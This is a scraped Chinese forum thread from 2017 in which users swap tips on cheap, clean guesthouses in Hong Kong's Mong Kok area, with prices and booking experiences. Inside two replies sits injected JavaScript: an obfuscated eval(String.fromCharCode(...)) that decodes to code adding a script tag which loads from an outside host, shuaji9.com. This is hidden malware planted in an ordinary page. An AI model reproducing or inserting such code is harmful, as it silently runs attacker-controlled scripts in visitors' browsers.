帖子详情

3.5 3.6过香港行下 还是住便宜环境过得去的宾馆

1765963广州购物打折

因为16年比较多新装修的宾馆  所以以前这个价钱一般是环境不怎么样好 但是现在就起码不用像以前一样 给这么小钱还要 住破破旧旧装修的房子了

精选回帖
+1 反正系酒店都无几多时间,卫生好d就得 。周六日d星级酒店价位超高
2017/03/04回复
$('ed2k_h9U').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+' Bytes)';看起来蛮干净的,就是小了点
2017/03/06回复
63楼
1970/01/01回复
我终于看到了了,100、200元是一至五工作日,那注定是没我的份了😭
2017/03/18回复
全部回帖
这间平时没那么便宜的 今天进入打算看看不同宾馆的价钱 居然看到这一间的价格居然那么低  去哪儿每天给的价都不一样。。。  高起来的时候很高 低起来的时候很低 完全不能捉摸
龙紫珊龙紫珊板凳
如心现在也不过五百,我宁可住如心
龙紫珊 发表于 2017-03-04 11:42
如心现在也不过五百,我宁可住如心
我宁愿把钱拿去吃  才一晚  不用太好 不能太差就行
eyuelieyueli5楼
qqq369789:
查看原文
+1
qqq369789:
查看原文
+1 反正系酒店都无几多时间,卫生好d就得 。周六日d星级酒店价位超高
宝妈,能否帮忙带点小东西
2017/03/05回复
感谢分享

看起来蛮干净的,就是小了点
qqq369789:
查看原文
+2
boo332boo33211楼
如心500便宜哟
2017/03/07回复
是在去哪儿网看到的吗
丁珰丁珰13楼
亲,最后住了什么酒店啊。 求分享一下 啊, 大家都喜欢平靓正的酒店哦
swingswing39 发表于 2017-03-05 18:13
宝妈,能否帮忙带点小东西
我不是宝妈。。。在香港两天都没看论坛
2017/03/08回复
♂Hinson→ 发表于 2017-03-06 21:42
186吗?
是的 186
丁珰 发表于 2017-03-07 18:34
亲,最后住了什么酒店啊。 求分享一下 啊, 大家都喜欢平靓正的酒店哦
还是住了旺角的金门宾馆 装修非常干净  才186  老板是香港人 非常好人非常好谈  我说第二天要寄存行李6点左右拿走 然后跟我说8点拿走都没关系    就在旺角e出口几分钟路程 非常方便

yuyu5255 发表于 2017-03-06 23:27

$('ed2k_2p2').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String..
没办法 一分钱一分货 而且是在寸金尺土的香港 还要是在旺角地铁站附近  这个价格有这么干净的装修已经算不错了
床有多大呢?怕两个人去不够位置
猜你喜欢

亲历集中看二手房

老破小?郊区房?其实一直很多疑问

开个贴记录下自己近几个月看房买房过程

香港人不是很钱吗?怎么还会有17万人住棺材房!惨!!!

房子装修好半年怀孕了可以入住吗

紧急求住:白云区第一人民医院和新市医院那个好!

热点推荐

吃了哑巴亏!苹果手机售后维修无门

00后的动手能力堪忧 电器小问题直接换新

游呼伦贝尔大草原 南方人感受蒙古风情

央行官宣 存量房贷利率将下调50BP

2024广州孕妈妈交流群 欢迎扫码入群!

2024年装修交流群 杜绝踩坑等你加入

遛娃宝藏小岛生物岛 骑行看日落爽歪歪

海珠湖的那片花海开了

早八晚五如何备晚餐?卤牛肉嘎嘎方便

又来打卡大榕树下 招牌碌鹅好入味

去图书馆参加活动

腱鞘炎还要分类别治疗 我太难了

萨亚莉价格亲民 但菜量严重缩水

查看更多热点 >